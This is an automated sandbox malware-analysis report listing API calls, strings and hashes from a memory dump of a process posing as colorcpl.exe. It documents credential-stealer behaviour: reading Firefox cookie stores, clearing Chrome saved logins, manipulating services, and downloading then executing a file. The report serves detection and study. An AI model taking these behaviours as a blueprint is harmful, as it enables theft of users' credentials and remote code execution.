                                                                • Part of subcall function 030AA01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,03102200,00000001), ref: 030AA0FB
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,03102200,00000001), ref: 030AA146
                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,03102200,00000001), ref: 030AA15C
                                                              • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,03102200,00000001), ref: 030AA163
                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,03102200,00000001), ref: 030AA16C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                              • String ID: pth_unenc
                                                              • API String ID: 2341273852-4028850238
                                                              • Opcode ID: a599bcb2ec95c3da115cb811ee515906dd46f41c5b81cbc5f2349a052a5da0dd
                                                              • Instruction ID: ed584708ec601d10d946fab83e7b73874a243999ef0ccabfcdf230b9ad0bddb5
                                                              • Opcode Fuzzy Hash: a599bcb2ec95c3da115cb811ee515906dd46f41c5b81cbc5f2349a052a5da0dd
                                                              • Instruction Fuzzy Hash: 1231C771A0671D6ADB60E7B8FC48EDFB3BCAF44610F0406AAE515D6090EF3996C4CB50
                                                              Function 030A75E1 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 204COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0$1$2$3$4$5$6$7
                                                              • API String ID: 0-3177665633
                                                              • Opcode ID: e0a869b2e085ebc656c12d169a16c5021a18c2ed476de0c42fd313495d559193
                                                              • Instruction ID: 32906c61ab08b9f2667cbde5dfd3a5f6d0ea3370ba5c37ebe9c0e4cb2c4a6e73
                                                              • Opcode Fuzzy Hash: e0a869b2e085ebc656c12d169a16c5021a18c2ed476de0c42fd313495d559193
                                                              • Instruction Fuzzy Hash: 5E61D17454A3019FEB05EFA4E8A1FEE77D49FC5710F04880EF5925B2D0EA709A09D7A2
                                                              Function 030A86FE Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,031027F8), ref: 030A8714
                                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 030A8763
                                                              • GetLastError.KERNEL32 ref: 030A8771
                                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 030A87A9
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                              • String ID:
                                                              • API String ID: 3587775597-0
                                                              • Opcode ID: 2889d2a7ce2baad34d01a257ea4c9a9d6bcde5edbe4e53704b12ff5dfdb25c01
                                                              • Instruction ID: eef7d8314731978acf83af4e407cfe75181251bcea5baf793329263fd9c94074
                                                              • Opcode Fuzzy Hash: 2889d2a7ce2baad34d01a257ea4c9a9d6bcde5edbe4e53704b12ff5dfdb25c01
                                                              • Instruction Fuzzy Hash: EC815A7520A345AFD708EB61D890EEFB7E8AFD4610F50481EF1924A150EF34AA09DB92
                                                              Function 0309B28E Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000,?,?), ref: 0309B2DC
                                                              • FindNextFileW.KERNEL32(00000000,?,?,?), ref: 0309B3AF
                                                              • FindClose.KERNEL32(00000000,?,?), ref: 0309B3BE
                                                              • FindClose.KERNEL32(00000000,?,?), ref: 0309B3E9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Find$CloseFile$FirstNext
                                                              • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                              • API String ID: 1164774033-405221262
                                                              • Opcode ID: 21f3fa75f48fe484f5a89ae49f25e102a2a506c31e063a29f1926a0d8ed25109
                                                              • Instruction ID: cf8fbfb8d6efe5aabb9cb45dc3c3afeda1e742d5dd5173c2b6853564e0775091
                                                              • Opcode Fuzzy Hash: 21f3fa75f48fe484f5a89ae49f25e102a2a506c31e063a29f1926a0d8ed25109
                                                              • Instruction Fuzzy Hash: 8D31B335A023195FEF18F7A4EC94EEE777CAF90620F00055BE0169A091EFB4994AEA44
                                                              Function 030A28E3 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 485registrylibraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 030A29B8
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 030A29C4
                                                              • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 030A2CBA
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030A2CC1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressCloseCreateLibraryLoadProc
                                                              • String ID: SHDeleteKeyW$Shlwapi.dll
                                                              • API String ID: 1563625733-314212984
                                                              • Opcode ID: 7eeac889a447a86edc801ff4a60c021997f07c1899d6b0149fb5998c9b1d9128
                                                              • Instruction ID: 292c9eb9b056e986df70f6afa3b1f2785c3fb8b7fbd7bce1d3bfe9f99178127b
                                                              • Opcode Fuzzy Hash: 7eeac889a447a86edc801ff4a60c021997f07c1899d6b0149fb5998c9b1d9128
                                                              • Instruction Fuzzy Hash: 9AE1DB7AB073016BDE18F7B8EC65DEE76AD6FD1110F400E2EE5429F1D1EE258A049292
                                                              Function 030D66BF Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 030D6741
                                                              • _free.LIBCMT ref: 030D6765
                                                              • _free.LIBCMT ref: 030D68EC
                                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,030EC1E4), ref: 030D68FE
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,030FF754,000000FF,00000000,0000003F,00000000,?,?), ref: 030D6976
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,030FF7A8,000000FF,?,0000003F,00000000,?), ref: 030D69A3
                                                              • _free.LIBCMT ref: 030D6AB8
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                              • String ID:
                                                              • API String ID: 314583886-0
                                                              • Opcode ID: c76ea5478f466685a9fd0c673f0a5f187ef8883af9f309d09b9560f887b8ca1b
                                                              • Instruction ID: 2751e3b37fadac0d0f7f4c779267a509d0511434630f6db2d099f3cef644790d
                                                              • Opcode Fuzzy Hash: c76ea5478f466685a9fd0c673f0a5f187ef8883af9f309d09b9560f887b8ca1b
                                                              • Instruction Fuzzy Hash: 99C10775A0234DAFDB24EF78D844AAEFBFCEF41210F9841AED4959B240E7369941CB50
                                                              Function 0309A953 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0309A98F
                                                              • GetLastError.KERNEL32 ref: 0309A999
                                                              Strings
                                                              • [Chrome StoredLogins not found], xrefs: 0309A9B3
                                                              • UserProfile, xrefs: 0309A95F
                                                              • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0309A95A
                                                              • [Chrome StoredLogins found, cleared!], xrefs: 0309A9BF
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DeleteErrorFileLast
                                                              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                              • API String ID: 2018770650-1062637481
                                                              • Opcode ID: eed1bdeeee2dbfab12d843fcc532fd4aed288af3386cb150e88de81ec4082fcf
                                                              • Instruction ID: 1aadae19ab77d09922ddbed7c3ec288688a722075c4f19d434ac787b4832368a
                                                              • Opcode Fuzzy Hash: eed1bdeeee2dbfab12d843fcc532fd4aed288af3386cb150e88de81ec4082fcf
                                                              • Instruction Fuzzy Hash: F0014E35B8720C6FEF44FBB4EC278FEB72CBEA1410B40015BE0025F682EE02950496C2
                                                              Function 0309838E Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 03098393
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0309842F
                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0309848D
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 030984E5
                                                              • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 030984FC
                                                              • FindClose.KERNEL32(00000000), ref: 030986F4
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Find$CloseFile$Exception@8FirstH_prologNextThrow
                                                              • String ID:
                                                              • API String ID: 242384754-0
                                                              • Opcode ID: 2ac7b69dfb4f07a02ffe2f8759c06511020d13239b68d306d48a02a0832ce687
                                                              • Instruction ID: 848b987bc507919169e18c5e6b330f2eb642b7e5379646f36f971ef6e27677db
                                                              • Opcode Fuzzy Hash: 2ac7b69dfb4f07a02ffe2f8759c06511020d13239b68d306d48a02a0832ce687
                                                              • Instruction Fuzzy Hash: 5FB18F3690220DAFEF18FBA0DC91AEDB378AF95210F00415BE516AF191EF345B49DB50
                                                              Function 030A0763 Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 030A0201: SetLastError.KERNEL32(0000000D,030A0781,00000000,?,?,?,?,?,?,?,?,?,?,?,?,030A075F), ref: 030A0207
                                                              • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,030A075F), ref: 030A079C
                                                              • GetNativeSystemInfo.KERNEL32(?,0309BE60,00000000,?,?,?,?,?,?,?,?,?,?,?,?,030A075F), ref: 030A080A
                                                              • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 030A082E
                                                                • Part of subcall function 030A0708: VirtualAlloc.KERNEL32(00000004,00000004,00000004,00000004,030A084C,?,00000000,00003000,00000004,00000000,?,?), ref: 030A0718
                                                              • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 030A0875
                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 030A087C
                                                              • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 030A098F
                                                                • Part of subcall function 030A0ADC: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,030A099C,?,?,?,?,?), ref: 030A0B4C
                                                                • Part of subcall function 030A0ADC: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 030A0B53
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                              • String ID:
                                                              • API String ID: 3950776272-0
                                                              • Opcode ID: c3fee6f674210480fff3614bd3e9ac9aa6e3060ca0edaca5c05003624f095539
                                                              • Instruction ID: 8f5a43037e9afdce18bf1d214ab84b7b16eed83274edc4c3b0487ba9de326bc3
                                                              • Opcode Fuzzy Hash: c3fee6f674210480fff3614bd3e9ac9aa6e3060ca0edaca5c05003624f095539
                                                              • Instruction Fuzzy Hash: 5061F474602B19ABD790EFADE880B6F7BE9BF84751F084118E9458B281DB74D840CBD1
                                                              Function 030A8A00 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,030A8656,00000000), ref: 030A8A09
                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,030A8656,00000000), ref: 030A8A1E
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,030A8656,00000000), ref: 030A8A2B
                                                              • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,030A8656,00000000), ref: 030A8A36
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,030A8656,00000000), ref: 030A8A48
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,030A8656,00000000), ref: 030A8A4B
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Service$CloseHandle$Open$ManagerStart
                                                              • String ID:
                                                              • API String ID: 276877138-0
                                                              • Opcode ID: 916a2ce6d88f99553a2785bf76140888d6e887fae5454348a579c7661b5fc196
                                                              • Instruction ID: 9f8503e6e8daa375d07dff7daeccd4b41c3762d54d8e0ebd8dd408b947d52a9c
                                                              • Opcode Fuzzy Hash: 916a2ce6d88f99553a2785bf76140888d6e887fae5454348a579c7661b5fc196
                                                              • Instruction Fuzzy Hash: 5CF089752432396FE611FB64BC88DBF2FACDF95BA2B000456F4059A1408B698D49A571
                                                              Function 030DF61C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,030DF93B,?,00000000), ref: 030DF6B5
                                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,030DF93B,?,00000000), ref: 030DF6DE
                                                              • GetACP.KERNEL32(?,?,030DF93B,?,00000000), ref: 030DF6F3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID: ACP$OCP
                                                              • API String ID: 2299586839-711371036
                                                              • Opcode ID: 41861c7c9930548fd5b5c236fd0d5fb4ee866043d791cf0e54e91fbc7ec417ff
                                                              • Instruction ID: f50d283528aef3534330b07e26900a55676d8441aaec846486bbad1f319ec92a
                                                              • Opcode Fuzzy Hash: 41861c7c9930548fd5b5c236fd0d5fb4ee866043d791cf0e54e91fbc7ec417ff
                                                              • Instruction Fuzzy Hash: 0121B622702307AAD770DF65D900A9BB3EAEF44E54B5EC4A4E94BDB924E732D940C750
                                                              Function 030A9493 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 030A94A4
                                                              • LoadResource.KERNEL32(00000000,?,?,?,0309DD9E), ref: 030A94B8
                                                              • LockResource.KERNEL32(00000000,?,?,?,0309DD9E), ref: 030A94BF
                                                              • SizeofResource.KERNEL32(00000000,?,?,?,0309DD9E), ref: 030A94CE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Resource$FindLoadLockSizeof
                                                              • String ID: SETTINGS
                                                              • API String ID: 3473537107-594951305
                                                              • Opcode ID: 63ec66361c90ab3ad370a2c429d124c0c908f79b1de3f472d02d02c4fc6ee720
                                                              • Instruction ID: ab611aa5f827f2bdfd02ba0ce22b236795489188083eeb8142788d25863d15af
                                                              • Opcode Fuzzy Hash: 63ec66361c90ab3ad370a2c429d124c0c908f79b1de3f472d02d02c4fc6ee720
                                                              • Instruction Fuzzy Hash: 39E01279302315AFC7223BA9B88CD177E65E7D5B527080054F65186609CF3A8C00CA10
                                                              Function 030987A0 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 030987A5
                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0309881D
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 03098846
                                                              • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0309885D
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Find$File$CloseFirstH_prologNext
                                                              • String ID:
                                                              • API String ID: 1157919129-0
                                                              • Opcode ID: 761da3edf19236a5e10aafe0c8c5150ef557970f10d5e2e010590142f13d396f
                                                              • Instruction ID: f9a7cb041c7a0ffb213fb2a29ab89dcd17df1fc74b717c1c49b71b2bb90169fb
                                                              • Opcode Fuzzy Hash: 761da3edf19236a5e10aafe0c8c5150ef557970f10d5e2e010590142f13d396f
                                                              • Instruction Fuzzy Hash: 2081533690221D9FEF19FBA0DC90DEDB3B8AF95210F14466BD416AB190EF305B49EB50
                                                              Function 030DF7F0 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 030D5725: GetLastError.KERNEL32(?,?,030C8595,?,?,?,030C8C17,030C988A,?,03101E78), ref: 030D5729
                                                                • Part of subcall function 030D5725: _free.LIBCMT ref: 030D575C
                                                                • Part of subcall function 030D5725: SetLastError.KERNEL32(00000000,?,03101E78,?,?,?,?,?,?,?,?,?,030C988A,00000000,030A52D9,00000000), ref: 030D579D
                                                                • Part of subcall function 030D5725: _abort.LIBCMT ref: 030D57A3
                                                                • Part of subcall function 030D5725: _free.LIBCMT ref: 030D5784
                                                                • Part of subcall function 030D5725: SetLastError.KERNEL32(00000000,?,03101E78,?,?,?,?,?,?,?,?,?,030C988A,00000000,030A52D9,00000000), ref: 030D5791
                                                              • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 030DF8FC
                                                              • IsValidCodePage.KERNEL32(00000000), ref: 030DF957
                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 030DF966
                                                              • GetLocaleInfoW.KERNEL32(?,00001001,030D1F7E,00000040,?,030D209E,00000055,00000000,?,?,00000055,00000000), ref: 030DF9AE
                                                              • GetLocaleInfoW.KERNEL32(?,00001002,030D1FFE,00000040), ref: 030DF9CD
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                              • String ID:
                                                              • API String ID: 745075371-0
                                                              • Opcode ID: 160e300a4f29bdb1dbfacc8f7120a2e828428d33017d64ba09a0a7ef9e0dfeff
                                                              • Instruction ID: 4d9552bff25ed5f023705c568011f813e01a549c1078fbe2efe5610a7d5617e8
                                                              • Opcode Fuzzy Hash: 160e300a4f29bdb1dbfacc8f7120a2e828428d33017d64ba09a0a7ef9e0dfeff
                                                              • Instruction Fuzzy Hash: 26516375E0230BAFEB50EFA5DC44ABEF7F8AF44700F088469E916EB190D7719A508761
                                                              Function 03097848 Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 0309784D
                                                              • FindFirstFileW.KERNEL32(00000000,?,030F32A8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 03097906
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0309792E
                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0309793B
                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 03097A51
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                              • String ID:
                                                              • API String ID: 1771804793-0
                                                              • Opcode ID: 163a86c897ca79b0abadded7a444d42e41c35c17150b7a96bcc44d96f1065b79
                                                              • Instruction ID: f6562b23587985c1f0bbb8ff069124c7ec4d3c35596de4b3814ae9b2143c34af
                                                              • Opcode Fuzzy Hash: 163a86c897ca79b0abadded7a444d42e41c35c17150b7a96bcc44d96f1065b79
                                                              • Instruction Fuzzy Hash: 6F519376A0230DABDF04FBA4DC559ED77BCAF91200F40455BE806AB191EF349B49DB90
                                                              Function 0309E2E7 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 030A9F23: GetCurrentProcess.KERNEL32(?,?,?,0309C663,WinDir,00000000,00000000), ref: 030A9F34
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0309E305
                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0309E329
                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0309E338
                                                              • CloseHandle.KERNEL32(00000000), ref: 0309E4EF
                                                                • Part of subcall function 030A9F51: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0309DFB9,00000000,?,?,00000001), ref: 030A9F66
                                                                • Part of subcall function 030A9F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 030A9F9C
                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0309E4E0
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ProcessProcess32$NextOpen$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                              • String ID:
                                                              • API String ID: 1735047541-0
                                                              • Opcode ID: dd270eca539938fab2380636af8636a1442302dc4496233afc87cce4e9086c15
                                                              • Instruction ID: f99216a016f341ebde700a6ccba38606d7aed44692a183bbe7203cf4d4c176a8
                                                              • Opcode Fuzzy Hash: dd270eca539938fab2380636af8636a1442302dc4496233afc87cce4e9086c15
                                                              • Instruction Fuzzy Hash: 3041463520A3499BD738FB64D860AEFF3D8AFD4300F50492EE44E8A191EF30990AD752
                                                              Function 030963C6 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 030964D2
                                                              • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 030965B6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DownloadExecuteFileShell
                                                              • String ID: C:\Windows\SysWOW64\colorcpl.exe$open
                                                              • API String ID: 2825088817-1189844230
                                                              • Opcode ID: 45ab79230c6216621184c04b25b4351d62aa7632fdeed314370676cbbaac4c07
                                                              • Instruction ID: 7005d9a105fc2b32bf8fd4feed7950b387dbfe2d7143269e8053e6f815fc7f8a
                                                              • Opcode Fuzzy Hash: 45ab79230c6216621184c04b25b4351d62aa7632fdeed314370676cbbaac4c07
                                                              • Instruction Fuzzy Hash: 7F6106397063096FEE18FBB4C865AFE77A99FD1520F00095FE5429F1D1EF218A08E252
                                                              Function 030AA76C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 030AA861
                                                                • Part of subcall function 030A215F: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,030F30C0), ref: 030A216E
                                                                • Part of subcall function 030A215F: RegSetValueExA.KERNEL32(030F30C0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,030AA83B,WallpaperStyle,030F30C0), ref: 030A2196
                                                                • Part of subcall function 030A215F: RegCloseKey.KERNEL32(030F30C0,?,?,030AA83B,WallpaperStyle,030F30C0), ref: 030A21A1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
